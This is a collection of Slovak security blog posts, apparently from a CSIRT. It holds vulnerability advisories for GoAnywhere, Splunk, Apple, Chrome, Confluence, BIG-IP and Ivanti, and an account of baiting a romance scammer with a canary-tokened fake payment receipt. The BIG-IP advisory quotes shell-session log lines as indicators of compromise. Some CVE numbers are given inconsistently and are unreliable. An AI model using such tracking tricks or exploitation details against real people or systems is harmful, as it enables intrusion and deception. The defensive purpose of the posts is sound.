https://nvd.nist.gov/vuln/detail/CVE-2023-34063

https://nvd.nist.gov/vuln/detail/CVE-2023-34048

https://nvd.nist.gov/vuln/detail/CVE-2023-34056

https://www.securityweek.com/vmware-urges-customers-to-patch-critical-aria-automation-vulnerability/

https://thehackernews.com/2024/01/citrix-vmware-and-atlassian-hit-with.html

https://kb.vmware.com/s/article/96098

https://socradar.io/patches-available-for-a-critical-vulnerability-in-vmware-aria-automation-cve-2023-34063/

https://www.vmware.com/security/advisories/VMSA-2023-0023.html

https://www.bleepingcomputer.com/news/security/vmware-confirms-critical-vcenter-flaw-now-exploited-in-attacks/

https://thehackernews.com/2024/01/chinese-hackers-silently-weaponized.html

Kritická zraniteľnosť v GoAnywhere MFT

Marian Danko — Mon, 05 Feb 2024 09:48:33 +0000

V produkte GoAnywhere Managed File Transfer (MFT) od spoločnosti Fortra bola nájdená bezpečnostná chyba. Úspešné zneužitie chyby umožňuje neautentifikovanému útočníkovi vytvoriť nového administrátorského používateľa systému. Celkovo 96,4% inštancií používa zraniteľnú verziu systému.

Zraniteľné systémy:

Fortra’s GoAnywhere MFT staršie ako 7.4.1

Opis činnosti:

CVE-2024-0204 (CVSS skóre 9,8 )

Kritická zraniteľnosť CVE-2024-0204 sa nachádza v softvéri GoAnywhere Managed File Transfer (MFT). CVE-2024-0204 sa týka obídenia autentifikácie a umožňuje neautentifikovanému útočníkovi vytvoriť nového používateľa s administrátorskými oprávneniami. Chyba je výsledkom nesprávnej normalizácie cesty pri pokuse o vyžiadanie koncového bodu “/InitialAccountSetup.xhtml”. Na zraniteľnosť poukázali výskumníci Mohammed Eldeeb a Islam Elrfai zo spoločnosti Spark Engineering Consultants.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Zvýšenie privilégií

Odporúčania:

Bezodkladná aktualizácia na verziu 7.4.1 alebo novšiu.

Používateľom, ktorí nemôžu aktualizovať svoj systém na verziu 7.4.1, odporúčame skontrolovať skupinu Admin Users v administratívnom portáli GoAnywhere, či v nej nebol nelegitímne vytvorený nový účet. Ako dočasné riešenie môžete v nekontajnerizovaných nasadeniach odstrániť súbor InitialAccountSetup.xhtml a reštartovať príslušné služby.

Odkazy:

Vysoko závažná zraniteľnosť v Splunk Enterprise

Marian Danko — Mon, 05 Feb 2024 09:37:23 +0000

Spoločnosť Splunk vydala opravy zraniteľností v Splunk Enterprise vrátane chyby s vysokou závažnosťou, ktorá ovplyvňuje inštancie systému Windows. Úspešné zneužitie môže umožňovať odmietnutie služby alebo vykonávanie ľubovoľného kódu.

Zraniteľné systémy:

Splunk Enterprise pre Windows 9.0- Splunk Web 9.0.0 až 9.0.7
Splunk Enterprise pre Windows 9.1- Splunk Web 9.1.0 až 9.1.2

Opis činnosti:

CVE-2024-23678 (CVSS skóre 7,8)

Vysoko závažná zraniteľnosť CVE-2023-23678 sa týka len nástroja Splunk Enterprise pre Windows a nachádza sa v komponente Splunk Web. Chyba súvisí s nesprávnou sanitizáciou cesty k súboru, v ktorom sú uložené serializované dáta a preto môže viesť k deseralizácii nedôveryhodných údajov z disku (cesta môže byť útočníkom podvrhnutá). Deserializácia je proces transformácie uložených dát do objektov, s ktorými dokáže program pracovať. Úspešné zneužitie môže viesť k zneprístupneniu služby (angl. Denial of Service) alebo ľubovoľné vykonávanie kódu.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Vykonávanie ľubovoľného kódu
Odmietnutie služby (DoS)

Odporúčania:

Bezodkladná aktualizácia Splunk Enterprise pre Windows na verzie 9.0.8 a 9.1.3 alebo novšie. Pokiaľ sa používatelia neprihlasujú do služby Splunk Web v distribuovanom prostredí, odporúčame vypnúť službu Splunk na týchto inštanciách.

Odkazy:

Aktívne zneužívaná zero-day zraniteľnosť v Apple

Marian Danko — Mon, 05 Feb 2024 09:29:01 +0000

Spoločnosť Apple vydala aktualizáciu pre zero-day zraniteľnosť CVE-2024-23222, ktorá môže viesť k vykonávaniu ľubovoľného kódu. Chyba je aktívne zneužívaná.

Zraniteľné systémy:

iPhone 8, iPhone 8 Plus, iPhone X, iPhone XS a novšie
iPad 5. generácia,iPad Pro a iPad Pro 1. generácia, iPad Pro 2. generácia a novšie
iPad Air 3. generácia a novšie, iPad 6. generácia a novšie, iPad mini 5. generácia a novšie
Mac s macOS Monterey a novšie
Apple TV HD a Apple TV 4K

Opis činnosti:

CVE-2024-23222

Zero-day zraniteľnosť CVE-2024-23222 sa nachádza vo frameworku WebKit a umožňuje útočníkovi ľubovoľné vykonávanie kódu. Chyba sa týka nedostatočného overenia typu premennej frameworku WebKit, pre webový prehliadač Safari. Úspešné zneužitie si vyžaduje, aby obeť otvorila škodlivú webovú stránku.

Zero-day zraniteľnosť je aktívne zneužívaná.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Ľubovoľné vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia tvOS 17.3, iOS 17.3 a iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 a iPadOS 16.7.5, Safari 17.3, macOS Ventura 13.6.4, macOS Monterey 12.7.3. alebo na najnovšiu verziu.

Odkazy:

Vyskúšali sme za vás: Romantickí podvodníci

Marian Danko — Fri, 02 Feb 2024 12:40:28 +0000

Pravdepodobne ste o nich počuli alebo čítali, no nepripúšťate si, že by sa to mohlo stať aj Vám. Skutočnosť je však temnejšia, ako predpokladáme a romantické podvody sú bohužiaľ každodennou praxou. Ako takýto podvod vyzerá, ako komunikuje podvodník so svojou obeťou a aké triky používa? Vyskúšali sme za Vás a prinášame Vám skúsenosti a rady, ako podobné aktivity prekuknúť hneď na začiatku.

Jedného zimného večera sedíme v ospalej atmosfére príjemne vyhriatej izby. Ventilátor počítača jemne pradie. Svetlo monitora mäkko dopĺňa svit samostatne stojacej náladovej lampy. Prechádzame svoj manažér hesiel Keepass, keď nám oči padnú na náš starý účet na Pokeci. Skúšame či funguje a s prekvapením zisťujeme, že táto služba sa aj dnes teší nemalej obľube. Nejaký čas sa preklikávame jej funkciami a používateľmi, až nám zasvieti červený bodík s číslom 1 nad položkou „Stretko“ – „Zaujímajú sa o teba“. So zdvihnutým obočím klikáme na lákavú položku a po načítaní obsahu by naše obočie pokojne vyhralo olympijskú medailu v skoku do výšky. Ukazuje sa nám obrázok veľmi sympatickej blonďavej slečny. Píšeme jej zopár slov na úvod a nechávame večer lenivo plynúť ďalej.

Nasledujúci večer si nachádzame od slečny správu, že je rada, že sme sa spoznali a či by sme si radšej nepísali cez e-mail. V tom momente náš chladnúci záujem vystrieda v hlave blikajúce červené svetielko. Púšťame sa do niekoľkomesačnej e-mailovej konverzácie s podvodníkom, aby sme na vlastnej koži vyskúšali, ako vyzerá skutočný romance scam, alebo romantický podvod. Z lovca sa práve stala korisť…

Ďalším varovným signálom, ktorý sme si všimli, je vek konta. Podvodník si ho vytvoril len niekoľko dní predtým, ako nám napísal. Sociálne siete a zoznamovacie služby často monitorujú profily používateľov a ich námietky. Podvodné profily sa teda na ich serveroch dlho neohrejú. Preto sa snažia podvodníci presmerovať konverzáciu v krátkom čase na iný, menej monitorovaný kanál. Môže to byť e-mail, WhatsApp alebo podobná komunikačná platforma.

E-mailová komunikácia prebieha v slovenčine. Zloženie viet naznačuje, že podvodník píše v angličtine a používa službu Google Translate alebo jej obdobu. Toto je ďalší typický znak, že sa jedná o podvod. Zločinci sa často snažia viesť komunikáciu v materskom jazyku obete, aby vzbudili väčšie sympatie a aby mohli viesť svoje operácie aj s obeťami, ktoré nie sú jazykovo podkuté.

Spoznávanie sa

Aby sme uviedli veci na pravú mieru, celú dobu vystupujeme pod falošným menom a vymyslenou identitou. V druhom e-maili od fingovanej 30-ročnej dievčiny menom Natalya sa dozvedáme, že žije v Rusku v mestečku Dmitrov neďaleko Moskvy a pracuje ako sekretárka na miestnej polícii. Pýta sa nás na naše záľuby a prácu. Hľadá si vážnu známosť, šikovného a skúseného muža, s ktorým bude stáť za to budovať vzťah.

Samozrejme, tým vyvoleným mužom sme my, nech by sme sa prezentovali hocijakým spôsobom. Odpisovaniu nevenujeme veľa času a myšlienok. Naopak, snažíme sa otázkami zahltiť podvodníka, aby sme mu zobrali čo najviac času, ktorý by mohol venovať svojim skutočným obetiam. Na mnohé jeho otázky nereagujeme a zvyšné odbíjame s nádychom sarkazmu. Chceme zistiť, ako sa podvodník zachová. Nepohlo to s ním a píše nám, akoby nás vnímal ako zaujímavého a výnimočného človeka.

Naša 3. odpoveď z 15.12.2021 v ktorej sme reagovali sarkasticky. „Natalyu“ to neodradilo. Bolo to len kvôli jej nedostatkom v slovenčine?

Zo začiatku nám ku každej správe posiela „svoje“ fotky. Pri pohľade na ne na zlomok sekundy máme nádej, že naozaj ide iba o dievča, ktoré sa túži dostať zo svojej krajiny na západ. Spolu je ich až 29. Aj preto je ľahké uveriť, že ide o skutočné fotky človeka, s ktorým obeť komunikuje. Podvodníci však fotografie atraktívnych ľudí vedia ľahko získať z cudzích profilov na sociálnych sieťach, či ukradnúť z cloudových služieb. Často dokážete podvod odhaliť reverzným vyhľadávaním fotografií cez služby ako TinEye.com, či Google Image search. Nie je to však pravidlom. Schodnou cestou pre získanie nových fotografií je pre podvodníka tiež použiť Vaše fotky, o ktoré vás žiada v priebehu konverzácie, pri jeho ďalšej obeti. „Natalya“ si prirodzene vypýtala fotky už v prvých e-mailoch. Zahovorili sme to tým, že sa neradi fotíme a že ženy vraj nepotrebujú vidieť fotky tak veľmi ako muži. Zabralo to a tému už neotvára.

Nikdy neposielajte svoje nahé fotografie, aby ste druhej strane nedali nástroj, ktorým vás môže ľahko vydierať. Toto pravidlo sa oplatí dodržiavať aj v rámci skutočných partnerstiev. Na internete existujú stránky, kde sa jedinci, ktorí neunesú rozchod, mstia svojim bývalým partnerom zverejnením ich kompromitujúcich fotografií.

Prvé fotografie „Natalye“, ktoré nám poslala e-mailom. Jedná sa o veľmi atraktívnu mladú ženu, ktorá je v podvode pravdepodobne tiež obeťou – ktorej fotografie boli odcudzené.

Na tejto fotografii je viditeľný nápis na lodi v azbuke „Kapitánsky klub“.

Prvé fotografie „Natalye“, ktoré nám poslala e-mailom. Jedná sa o veľmi atraktívnu mladú ženu, ktorá je v podvode pravdepodobne tiež obeťou – ktorej fotografie boli odcudzené. Na prvej fotografii je viditeľný nápis na lodi v azbuke „Kapitánsky klub“.

Ako píšeme vyššie, naša „Natalya“ začína prejavovať záujem o nás nezvyčajne skoro, bez toho, aby sa nás predtým pokúsila bližšie spoznať. V druhej správe z 13.12.2021 nám prezrádza, že je nezadaná a hľadá vážny vzťah. Pýta sa nás, akú ženu hľadáme. O dve správy neskôr píše, že chce mužovi odovzdať všetku svoju lásku a vášeň, je veľmi osamelá a potrebuje vážny vzťah. Iba týždeň po prvom e-maili sa nás už pýta, či si myslíme, že by sme mohli byť spolu.

2. správa z 13.12.2021

5. správa zo 17.12.2021

Následne nám už nepriamo vyznáva lásku slovami „môžem len sľúbiť oddanosť“ a túžbu po stretnutí. Nasledujú vzletné a nadšené slová zaľúbenej ženy na celý odstavec: „Vieš, mám pocit, že každá nová správa je malé rande ;)“. Je 21.12.2021 a prijali sme siedmy e-mail. Dva dni nato dostávame správu so slovami: „Bola som veľmi osamelá. Ale teraz som našla skutočného muža, princa 21. storočia ;)“. Pritom sme písali pomerne neutrálne odpovede. Keby to v skutočnosti bolo také jednoduché, mnoho mužov by sa potešilo.

8. správa z 23.12.2021

E-mail, ktorý predchádzal vyznaniu, že „Natalya“ našla skutočného muža a princa 21. storočia v 8. správe z 23.12.2021. Ani sme sa veľmi nesnažili :). Čo to hovorí o mužoch, ktorých úbohá „Natalya“ stretáva vo svojej domovine?

Tesne po Vianociach dostávame od „Natalye“ sladký e-mail s prvými sexuálnymi narážkami: „…Ako keby sme boli spolu v posteli? Alebo ako ti uvarím raňajky len v košeli Myslím, že budeme dobrý pár.“ Hneď nato chce prejsť do ďalšej fázy vzťahu, používa otvorenejšie sexuálne narážky, začína nás volať „drahý“. A prichádza návrh, že pricestuje na návštevu. Pýta si našu adresu a názov letiska. Zdá sa, že našu odpoveď na tento e-mail „Natalya“ nedostala, alebo sa e-mail stratil v spame, no po objasnení situácie začne naplno plánovať svoj príchod a vzbudzuje v nás obrazové predstavy, aké to bude, keď budeme konečne spolu. Chce skypovať. Súhlasili sme, no vraj nemá doma kameru. Dohodla sa s kamarátom, ktorý kameru má, že bude volať od neho. Púšťame to dostratena, nechceme prezradiť našu indentitu.

O tri dni neskôr, 18.01.2022, organizuje „Natalya“ prílet. Píše, že cena za letenky a dokumenty je celkovo 764 Eur. Nemá aktuálne toľko peňazí, čo nás neprekvapuje. Pýta si od nás časť nákladov v sume 447 Eur: „Potrebujem 447 eur. Môžem sa na teba spoľahnúť?“ Toto sa deje jeden mesiac a týždeň od prvého e-mailu, ktorý sme si vymenili. Keď situáciu naťahujeme, podvodník začína komunikovať menej. „Natalya“ ochladla. Keď jej nadbiehame, dáva nám znova šancu. Tlačí na nás, aby sme sa rozhodli, či sa chceme stretnúť alebo či to chceme ukončiť. Dňa 31.1.2022 si opäť pýta sumu 447 Eur. Opäť začína písať dlhšie e-maily a opäť je prehnane romantická.

16. správa z 25.1.2022

18. správa z 28.1.2022 – opäť vrelšia po našom dobiedzaní

Dňa 2.2.2022 získavame bankové údaje „Natalye“, ktoré nahlasujeme kyberbezpečnostnej jednotke CSIRT zodpovednej za ruský bankový sektor. Rovnako nahlasujeme zneužitie fotografií pravdepodobne ruskej občianky. Odpoveď bohužiaľ nedostávame. Banka, ktorú podvodník používa, funguje online. Môže to byť účet bieleho koňa (tzv. money mule) alebo môže patriť priamo podvodníkovi, ak inštitúcia povoľuje vytvoriť účet na falošné meno či anonymne. Nasleduje séria zväčša kratších, no nadšených e-mailov. Podvodník čaká na platbu, pretože sme mu napísali, že sme peniaze poslali. Viackrát sa pýta, či sme uskutočnili prevod. 7.2.2022 posielame falošné potvrdenie o platbe z vymysleného čísla účtu. Keď ani po týždni peniaze neprichádzajú, vymýšľame sme si, že naša banka platbu vrátila ako podozrivú.

Na tomto mieste je dôležité podotknúť, že doba, za ktorú podvodník začne od svojej obete pýtať peniaze, sa môže líšiť. Dôvody bývajú tiež rôznorodé. Niekedy to môže trvať celé mesiace, kým sa podvodník uistí, že vytvoril dostatočne hlbokú dôveru. A teraz si skúsme uvedomiť, vžiť sa do situácie, ako by sme sa zachovali, keby sme mali finančné problémy my. Pýtali by sme si peniaze od človeka, s ktorým si píšeme pomerne krátky čas a ešte sme sa nikdy osobne nestretli? Pri tomto cvičení nám pravdepodobne príde celá situácia absurdná.

Ako sme využili potvrdenie o platbe

Počas našej konverzácie s podvodníkom chceme získať cenné informácie, ktoré by nám pomohli ho lokalizovať a v ideálnom prípade identifikovať. Využijeme na to tzv. Canary token, kúsok kódu, ktorý pri aktivácii odošle na vybranú destináciu informácie o zariadení, v ktorom sa nachádza. Vymýšľame, ako podvodníka presvedčiť, aby ho aktivoval.

V prvom pokuse ho umiestňujeme do dokumentu Microsoft Word. Zámienkou je písomné potvrdenie, že „Natalya“ použije požadovaných 447 Eur skutočne na cestovné nálady. Stačí nám, aby do prázdnej kolonky napísala svoje meno. Podvodník súhlasí. Posiela nám doplnený dokument. So sklamaním zisťujeme, že token sa neaktivoval napriek tomu, že nám pri testovaní fungoval.

Skúšame teda iný prístup. Vkladáme URL token priamo do tela e-mailu. Opäť bez úspechu aj keď na e-mail dostávame odpoveď (teda podvodník ho otvoril).

Nevzdávame sa a do tretice máme úspech. Do tela e-mailu vkladáme naše falošné potvrdenie o finančnom prevode, do ktorého sme injektovali canary token. Pre istotu vkladáme jeden URL token aj do tela e-mailu.

Náš e-mail s vloženým falošným potvrdením o platbe požadovaných 447 Eur na cestovné náklady, aby nás „Natalya“ mohla prísť navštíviť.

Zaujme nás hneď IP adresa, z ktorej podvodník operuje. Jedná sa o adresu, ktorú v tom čase využíval švajčiarsky poskytovateľ cloudových služieb. Podvodník je zdá sa zbehlý v spôsoboch anonymizácie svojej aktivity. Predpokladáme, že v skutočnosti sa nachádza v Nigérii alebo Indii, vo dvoch najbežnejších lokalitách internetových podvodníkov. „Natalya“ aktivovala token z dvoch internetových prehliadačov. Google Chrome nám veľa zaujímavých informácií neposkytuje. V Mozilla Firefox však upúta našu pozornosť jazyk internetového prehliadača. Podvodník používa estónčinu.

Zozbierané dáta pomocou canary tokenu. Token aktivoval podvodník z dvoch prehliadačov. V dátach pre prehliadač Mozilla Firefox vidíme, že podvodník používa estónsku jazykovú lokalizáciu.

V rámci informácii o geolokácii si môžeme všimnúť švajčiarskeho poskytovateľa cloudových služieb

Poďme si rozobrať podozrivé elementy komunikácie

Pozrime sa na aspekty komunikácie s „Natalyou“, ktoré vzbudzujú podozrenie, že niečo nie je v súlade s kostolným poriadkom.

„Natalya“ si nás vyhliadla na platforme Pokec. Prvé podozrenie naberáme už kvôli samotnému naratívu, že atraktívne dievča z Ruska si hľadá vážny vzťah na slovenskej sociálnej sieti. Hneď po prehodení prvej správy nám navrhuje komunikáciu cez e-mail. V hlave nám zasvieti prvé červené svetielko. Keď sa nápadník snaží čím skôr presunúť konverzáciu na iný kanál, znamená to najčastejšie jediné a to, že jeho podvodný profil na zoznamke alebo sociálnej sieti je ľahkým cieľom prevádzkovateľa služby, ktorý ho môže kedykoľvek bez upozornenia zrušiť. Podvodník by tak stratil kontakt so svojou obeťou. Častou voľbou podvodníkov je e-mail, WhatsApp alebo obdobná komunikačná platforma.

V krátkom čase, po výmene niekoľkých úvodných nemastných-neslaných správ, sa o nás začína neprirodzene zaujímať. Komplimenty sú nám samozrejme príjemné, no vieme, že sa nimi nesmieme nechať zaslepiť. Potrebujeme k nim pristupovať s kritickou mysľou. Kompliment si treba zaslúžiť. Pokiaľ ho dostaneme zadarmo, protistrana ním takmer isto sleduje zištný cieľ.

Správy, ktoré od „Natalye“ dostávame, sú v slovenčine, očividne strojovo preložené. Na tom by nebolo nič zvláštne. Analýzou textu správ však dospievame k záveru, že pôvodný text píše „Natalya“ v angličtine namiesto svojej rodnej reči. Vzhľadom na to, že používa prekladač, nedáva nám to celkom zmysel. Ukážeme niekoľko význačných fráz, podľa ktorých vidíme, že stavba jazyka pripomína angličtinu. Prvá veta predstavuje pôvodný text z e-mailov, veta v zátvorke je náš odhad originálneho textu pred prekladom:

O čom to rozprávaš? (What are you talking about?)
Richard, ako sa máš v kuchyni? (Richard, how are you in kitchen?)
Čaká na vašu odpoveď! (Waiting for your answer!)
Dúfam, že jedného dňa sa stretneme v skutočnom svete. (I hope one day we will meet in a real world.)
Vždy stojím na svojom. (I always stand on my own.)
Veci sú dobré? (Things are good?)
Obchod? (Deal?)
Teraz diabol vie, čo sa deje vo svete a na internete. (Now devil knows what is happening in the world and on the Internet.)
…ale zima je špeciálny čas. (…but winter is a special time.)
Naozaj milujem kvety, najmä tulipány. (I really love flowers, especially tulips.)
Dúfam, že sa vám bude páčiť čítanie mojej správy. (I hope you will like reading my message.)
Vidíme sa neskôr! (See you later!)
…pretože som už našiel špeciálneho človeka. (…because I already found special person.)
Nechcem od teba znova počuť. (I don’t want to hear from you again.)

Dôležitým varovným signálom sú skoré fyzické narážky a prejavy príťažlivosti. „Natalyi“ sme neposlali žiadne svoje fotky. Jediná, ktorú si mohla všimnúť, bola na Pokeci. Pokec však rýchlo opustila, jej účet bol zrušený. Pokúsme sa vcítiť do role peknej mladej ženy, ktorá má množstvo obdivovateľov a je zvyknutá na záujem atraktívnych mužov. Prejavovali by sme na jej mieste fyzické sympatie niekomu, koho fotky sme ani nevideli, nikdy sme ho nestretli naživo a vieme o ňom len niekoľko základných informácií?

Najväčším varovným signálom je, keď si „Natalya“ začína pýtať peniaze. Má skvelú zámienku – potrebuje ich na cestovné náklady, aby nás mohla prísť navštíviť. Zo zvedavosti, čo sa bude diať navrhujeme, nech nám pošle časť sumy, ktorú má našetrenú. Letenku jej kúpime a pošleme na e-mail s tým, že zvyšok ceny doplatíme. Na návrh dostávame odpoveď v podobe ochladnutia konverzácie.

Vhodným nástrojom na odhalenie podvodu je porovnanie našej komunikácie s našimi skúsenosťami z minulosti a vžitie sa do role náprotivnej strany, s ktorou komunikujeme. Jednali by sme rovnako, ak by sme mali čistý úmysel? Predtým, ako začnete svojmu neznámemu dôverovať, urobte si niekoľko testov. Spojte sa s ním cez videohovor a všímajte si, či pohyb pier zodpovedá slovám, ktoré počujete. Navrhnite stretnutie niekde na verejnosti. Nezdieľajte šteklivé fotografie, citlivé informácie a neposielajte peniaze človeku, s ktorým ste sa nestretli naživo.

Odporúčania

Keď Vás niekto osloví na Internete, pričom je hneď od začiatku alebo veľmi skoro nezvyčajne milý, rozdáva komplimenty, prejavuje silné city a rozpráva o spoločnej budúcnosti bez toho, aby Vás trochu lepšie poznal, zbystrite pozornosť.
Preverujte fotografie neznámeho nápadníka cez reverzné vyhľadávanie obrázkov (napríklad vyhľadávanie obrázkov Google, TinEye.com). Nie je to stopercentná záruka, no dáva Vám nezanedbateľnú šancu, že podvodníka odhalíte.
Neposielajte svoje fotografie, pokiaľ si nie ste istí, že skutočne komunikujete s človekom, za ktorého sa protistrana vydáva. Erotické fotografie neposielajte nikdy, aby ste sa nestali obeťou vydierania alebo neskončili na stránkach, kde si pomstychtiví jedinci vylievajú zlosť uverejňovaním kompromitujúcich fotografií svojich bývalých partnerov.
Neposkytujte citlivé informácie a svoje osobné údaje online.
Ak sa dohadujete na osobnom stretnutí, no protistrana viackrát stretnutie zruší pod rôznymi zámienkami, zbystrite pozornosť.
Ak ste človeku, s ktorým ste sa v živote nestretli, poslali peniaze, o ktoré vás prosil za ľubovoľným účelom, nahláste to bezodkladne polícii.
Nikdy nesúhlaste s prijímaním a preposielaním financií. Stanete sa tzv. money mule, resp. bielym koňom v procese prania špinavých peňazí.
Nikdy neposkytujte overovacie kódy, ktoré vám prídu na telefón a ktoré si protistrana od Vás pýta. V lepšom prípade si podvodník na Vašu identitu vytvorí nový účet na zoznamke, v horšom môžete potvrdiť prevod peňazí z Vášho účtu.

Zaujímavé zdroje

https://www.scamwatch.gov.au/types-of-scams/dating-romance

https://www.cyber.gov.au/acsc/view-all-content/guidance/step-1-screen-every-profile-image-using-reverse-online-image-search

https://www.fbi.gov/scams-and-safety/common-scams-and-crimes/romance-scams

https://www.girlsaskguys.com/other/q1138107-what-websites-do-guys-post-pictures-of-their-ex-girlfriends

https://www.pinterest.com/malescammers/pictures-used-by-male-scammers-in-dating-fraud/

https://www.pinterest.com/stopscammerscom/pictures-used-by-female-scammers-in-dating-scams/

Zero-day zraniteľnosť v Google Chrome

Marian Danko — Tue, 23 Jan 2024 10:54:01 +0000

Google vydal neočakávanú bezpečnostnú aktualizáciu pre aktívne zneužívanú zero-day zraniteľnosť. Zraniteľnosť CVE-2024-0519 je aktívne zneužívaná a môže viesť k vzdialenému vykonávaniu kódu.

Zraniteľné systémy:

Google Chrome verzie staršie ako 120.0.6099.224

Opis činnosti:

CVE-2024-0519 (CVSS skóre 8,8)

Zero-day zraniteľnosť CVE-2024-0519 sa nachádza v komponente V8 v Google Chrome a umožňuje pristupovať mimo povolené hodnoty pamäte. Vzdialeným útočníkom umožňuje napríklad pomocou škodlivej HTML stránky zneužiť poškodenie pamäte na halde. Vo všeobecnosti úspešné zneužitie chyby dovoľujúcej prístup mimo povolené hodnoty v pamäti umožňuje podľa identifikátora CWE získať adresy pamäte, ktoré môžu byť použité pre obídenie ochranných mechanizmov (ASLR) na dosiahnutie vzdialeného vykonávania kódu alebo nedostupnosti služby. ASLR je proces ochrany pamäte pred útokmi typu buffer-overflow (pretečenia medzipamäte), ktorý randomizuje umiestnenie určitých dát v pamäti.

Zraniteľnosť je aktívne zneužívaná.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Vzdialené vykonávanie kódu
Nedostupnosť služby (DoS)

Odporúčania:

Bezodkladná aktualizácia Chrome aspoň na verziu 120.0.6099.224/225 pre Windows, 120.0.6099.234 pre macOS a 120.0.6099.224 pre Linux alebo novšiu.

Odkazy:

Kritická zraniteľnosť v Confluence Data Center a Server

Marian Danko — Tue, 23 Jan 2024 10:39:09 +0000

Spoločnosť Atlassian vydala bezpečnostnú opravu pre kritickú zraniteľnosť CVE-2023-22527, ktorá umožňuje vzdialené vykonávanie kódu na koncových zariadeniach.

Zraniteľné systémy:

Confluence Data Center a Confluence Server: 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3

Opis činnosti:

CVE-2023-22527 (CVSS skóre 10)

Kritická zraniteľnosť CVE-2023-22527 sa nachádza v Confluence Data Center a Server. Chyba sa týka injektovania šablóny a umožňuje neautentifikovanému útočníkovi vzdialené vykonávanie kódu na koncových zariadeniach.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia aspoň na verzie Confluence Data Center a Server 8.5.4, Confluence Data Center 8.6.0 a 8.7.1.

Odkazy:

https://www.bleepingcomputer.com/news/security/atlassian-warns-of-critical-rce-flaw-in-older-confluence-versions/

https://thehackernews.com/2024/01/citrix-vmware-and-atlassian-hit-with.html

https://www.securityweek.com/atlassian-warns-of-critical-rce-vulnerability-in-outdated-confluence-instances/

https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html

https://nvd.nist.gov/vuln/detail/CVE-2023-22527

Aktívne zneužívaná zraniteľnosť v BIG-IP

Marian Danko — Tue, 23 Jan 2024 07:56:06 +0000

Spoločnosť F5 poukázala na aktívne zneužívanú zraniteľnosť CVE-2023-46747, ktorá umožňuje neautentifikovanému útočníkovi vzdialené vykonávanie kódu. Existuje viac ako 6 000 internetových inštancií, ktoré používajú aplikačnú sieťovú bezpečnosť BIG-IP, ktoré sú potenciálne ohrozené.

Zraniteľné systémy:

BIG-IP:

17.1.0 (Opravené v 17.1.0.3 + Hotfix-BIGIP-17.1.0.3.0.75.4-ENG)
16.1.0 – 16.1.4 (Opravené v 16.1.4.1 + Hotfix-BIGIP-16.1.4.1.0.50.5-ENG)
15.1.0 – 15.1.10 (Opravené v 15.1.10.2 + Hotfix-BIGIP-15.1.10.2.0.44.2-ENG)
14.1.0 – 14.1.5 (Opravené v 14.1.5.6 + Hotfix-BIGIP-14.1.5.6.0.10.6-ENG)
13.1.0 – 13.1.5 (Opravené v 13.1.5.1 + Hotfix-BIGIP-13.1.5.1.0.20.2-ENG)

Opis činnosti:

CVE-2023-46747 (CVSS skóre 9,8)

Kritická zraniteľnosť CVE-2023-46747 v konfiguračnom nástroji BIG-IP umožňuje neautentifikovanému útočníkovi so sieťovým prístupom k manažmentovému portu zraniteľného zariadenia vykonávať ľubovoľné systémové príkazy. Zraniteľnosť spočíva v prepašovaní škodlivej požiadavky, pomocou ktorej môže útočník získať administrátorské práva.

Zraniteľnosť je možné zreťaziť so zraniteľnosťou CVE-2023-46748, ktorá umožňuje autentifikovanému útočníkovi vykonávať SQL injekcie v konfiguračnom nástroji. To umožňuje útočníkom vykonávať systémové príkazy, čo môže viesť ku vzdialenému vykonávaniu kódu.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Ľubovoľné vykonávanie systémových príkazov
Eskalácia privilégií

Odporúčania:

VJ CSIRT odporúča obmedziť prístup k administratívnemu rozhraniu Traffic Management User Interface. Pre Big-IP verzie 14.1.0 a novšie spustite skript podľa návodu/postupu.

Používateľom sa odporúča skontrolovať súbor /var/log/tomcat/catalina.out, či sa v ňom nenachádzajú podozrivé záznamy, ako napríklad:

{…}

java.sql.SQLException: Column not found: 0.

{…)

sh: no job control in this shell

sh-4.2$

sh-4.2$ exit.

Aktualizácia BIG-IP na opravené verzie:

17.1.0.3 + Hotfix-BIGIP-17.1.0.3.0.75.4-ENG
16.1.4.1 + Hotfix-BIGIP-16.1.4.1.0.50.5-ENG
15.1.10.2 + Hotfix-BIGIP-15.1.10.2.0.44.2-ENG
14.1.5.6 + Hotfix-BIGIP-14.1.5.6.0.10.6-ENG
13.1.5.1 + Hotfix-BIGIP-13.1.5.1.0.20.2-ENG

Odkazy:

https://nvd.nist.gov/vuln/detail/CVE-2023-46747

https://thehackernews.com/2023/11/alert-f5-warns-of-active-attacks.html

https://my.f5.com/manage/s/article/K000137353

https://www.securityweek.com/attackers-exploiting-critical-f5-big-ip-vulnerability/

Dve zero-day zraniteľnosti v produktoch Ivanti

Marian Danko — Sat, 20 Jan 2024 09:50:50 +0000

Spoločnosť Ivanti poukázala na dve aktívne zneužívané zero-day zraniteľnosti v produktoch Ivanti. Zraniteľnosti sú aktívne zneužívané a boli zneužité hackerskou skupinou napojenou na čínsku vládu.

Zraniteľné systémy:

Ivanti Connect Secure a Policy Secure 9.x, 22.x

Opis činnosti:

Dve zero-day zraniteľnosti, CVE-2023-46805 a CVE-2024-24887, sa nachádzajú vo webovej súčasti produktov Ivanti Connect Secure a Policy Secure. Tieto zraniteľnosti boli aktívne zneužívané hackerskou skupinou napojenou na čínsku vládu.

CVE-2023-46805 (CVSS skóre 8,2)

Zraniteľnosť CVE-2023-46805 umožňuje útočníkovi obísť autentifikáciu, čo umožňuje získať prístup k chráneným zdrojom.

CVE-2024-21887 (CVSS skóre 9,1)

Kritická zraniteľnosť CVE-2024-24887 umožňuje autentifikovanému útočníkovi s administrátorskými oprávneniami vykonávať ľubovoľné príkazy na napadnutom zariadení.

